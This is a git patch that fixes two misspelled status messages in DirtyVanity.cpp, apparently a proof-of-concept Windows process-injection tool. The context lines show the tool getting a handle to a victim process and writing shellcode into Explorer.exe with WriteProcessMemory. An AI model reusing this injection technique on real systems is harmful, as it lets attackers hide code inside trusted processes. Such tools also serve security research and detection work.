From b7116153110237379ba095119c07154ad2e156f6 Mon Sep 17 00:00:00 2001 From: David Abutbul Date: Fri, 23 Dec 2022 12:52:35 +0200 Subject: [PATCH] Successfully --- DirtyVanity/DirtyVanity.cpp | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/DirtyVanity/DirtyVanity.cpp b/DirtyVanity/DirtyVanity.cpp index 644bb5a..e2d05a6 100644 --- a/DirtyVanity/DirtyVanity.cpp +++ b/DirtyVanity/DirtyVanity.cpp @@ -370,7 +370,7 @@ int main(int argc, char** argv) std::cout << std::format("[-] Error using OpenProcess on PID {}: ERROR {}", victimPid, GetLastError()) << std::endl; return -1; } - std::cout << "[+] Got a handle to PID " << pidArg << " succesfuly" << std::endl; + std::cout << "[+] Got a handle to PID " << pidArg << " successfully" << std::endl; // allocate shellcode within victim DWORD_PTR shellcodeSize = sizeof(shellcode); @@ -392,7 +392,7 @@ int main(int argc, char** argv) std::cout << std::format("[-] Error writing shellcode with WriteProcessMemory on Explorer.exe : ERROR {}", GetLastError()) << std::endl; return -1; } - std::cout << "[+] Succesfuly wrote shellcode to victim. about to start the Mirroring" << std::endl; + std::cout << "[+] Successfully wrote shellcode to victim. about to start the Mirroring" << std::endl; HMODULE lib = LoadLibraryA("ntdll.dll");